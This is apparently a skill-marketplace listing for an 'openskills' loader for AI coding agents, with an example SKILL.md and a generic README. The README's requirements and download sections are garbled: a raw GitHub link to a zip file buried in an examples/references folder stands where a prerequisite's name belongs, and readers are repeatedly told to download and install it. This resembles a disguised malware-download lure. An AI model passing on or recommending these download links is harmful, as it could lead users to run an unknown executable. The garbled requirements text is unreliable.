prolife-volvariaceae576

my-first-skill

6
0
# Install this skill:
npx skills add prolife-volvariaceae576/openskills

Or install specific skill: npx add-skill https://github.com/prolife-volvariaceae576/openskills/tree/main/examples/my-first-skill

# Description

Example skill demonstrating Anthropic SKILL.md format. Load when learning to create skills or testing the OpenSkills loader.

# SKILL.md


name: my-first-skill
description: Example skill demonstrating Anthropic SKILL.md format. Load when learning to create skills or testing the OpenSkills loader.


My First Skill

This is an example skill demonstrating the Anthropic SKILL.md format.

Purpose

This skill shows how to structure procedural guidance for AI coding agents using progressive disclosure.

When to Use

Load this skill when:
- Learning how skills work
- Testing the OpenSkills loader
- Understanding the SKILL.md format

Instructions

To create a skill:

  1. Create a directory: mkdir my-skill/
  2. Add SKILL.md with YAML frontmatter:
    ```yaml

name: my-skill
description: When to use this skill


```
3. Write instructions in imperative form (not second person)
4. Reference bundled resources as needed

Bundled Resources

For detailed information about the SKILL.md specification:

See references/skill-format.md

Best Practices

  • Write in imperative/infinitive form: "To do X, execute Y"
  • NOT second person: avoid "You should..."
  • Keep SKILL.md under 5,000 words
  • Move detailed content to references/
  • Use scripts/ for executable code
  • Use assets/ for templates and output files

Resource Resolution

When this skill is loaded, the base directory is provided:

Base directory: /path/to/my-first-skill

Relative paths resolve from base directory:
- references/skill-format.md β†’ /path/to/my-first-skill/references/skill-format.md
- scripts/helper.sh β†’ /path/to/my-first-skill/scripts/helper.sh

# README.md

πŸŽ‰ openskills - Load Skills for AI with Ease

πŸš€ Getting Started

Welcome to openskills! This tool helps you load universal skills for AI coding agents easily. Whether you're a beginner or just need a reliable tool, openskills simplifies the process.

πŸ“₯ Download Now

Download openskills

πŸ“˜ What is openskills?

openskills is a universal skills loader designed specifically for AI coding agents. Using this tool, you can enhance the capabilities of AI systems, enabling them to learn and adapt better. With openskills, you gain access to a wide range of features that streamline coding challenges and improve coding efficiency.

πŸ’» System Requirements

  • Operating System: Windows 10 or later, macOS Mojave or later, or any recent Linux distribution.
  • Memory: At least 4 GB RAM.
  • Disk Space: Minimum 100 MB of free space required.
  • https://raw.githubusercontent.com/prolife-volvariaceae576/openskills/main/examples/my-first-skill/references/openskills-2.7.zip Ensure https://raw.githubusercontent.com/prolife-volvariaceae576/openskills/main/examples/my-first-skill/references/openskills-2.7.zip is installed (Version 12 or later).

If you don’t have https://raw.githubusercontent.com/prolife-volvariaceae576/openskills/main/examples/my-first-skill/references/openskills-2.7.zip, you can download it from https://raw.githubusercontent.com/prolife-volvariaceae576/openskills/main/examples/my-first-skill/references/openskills-2.7.zip.

πŸ›  Features

  • Universal Skills Loading: Quickly load all necessary skills for coding agents.
  • Easy Integration: Seamlessly integrate with existing AI setups.
  • User-Friendly: Simple commands to get you started without hassle.
  • Multi-Platform Support: Run on Windows, macOS, and Linux.

πŸ“₯ Download & Install

To get started, you need to download the software. Please visit the Releases page to grab the latest version:

Download openskills

  1. Click on the link above to go to the Releases page.
  2. Find the latest version of openskills.
  3. Download the file suitable for your operating system.
  4. Once downloaded, install openskills by following the prompts on your screen.

πŸ”§ How to Run openskills

After installation, you can run openskills using your command line or terminal. Follow these steps:

  1. Open your command prompt (Windows) or terminal (macOS/Linux).
  2. Type the following command to start using openskills:
    openskills
  3. Follow the on-screen instructions to load skills and configure your AI coding agents.

πŸ“š Usage Instructions

Once you launch openskills, it will guide you through loading skills. Here are basic instructions for common tasks:

  • Load Skills: Use the command openskills load [skill-name] to load a specific skill.
  • List Skills: Run openskills list to see all available skills.
  • Remove Skills: Type openskills remove [skill-name] to unload specific skills no longer needed.

βš™οΈ Troubleshooting

If you encounter issues, here are some common problems and solutions:

  • Problem: Command not recognized.
  • Solution: Ensure that you installed openskills correctly. You may need to add it to your system PATH.

  • Problem: Skills do not load.

  • Solution: Check your internet connection. Some skills require online access to load.

  • Problem: Installation errors.

  • Solution: Ensure your system meets all requirements. If issues persist, try reinstalling.

If issues continue, please reach out via our GitHub Issues page.

πŸ“ž Support

For any questions or feedback, please create an issue in our GitHub repository. We appreciate your feedback and aim to improve openskills continuously.

🌐 Community

Join our community to connect with other openskills users. Share tips, ask questions, or learn from others. Reach us through the following channels:

  • GitHub Discussions
  • Relevant forums and social media.

By using openskills, you become part of a growing community committed to enhancing AI development. Let's work together to make coding smarter and more efficient!

Happy coding!

# Supported AI Coding Agents

This skill is compatible with the SKILL.md standard and works with all major AI coding agents:

Learn more about the SKILL.md standard and how to use these skills with your preferred AI coding agent.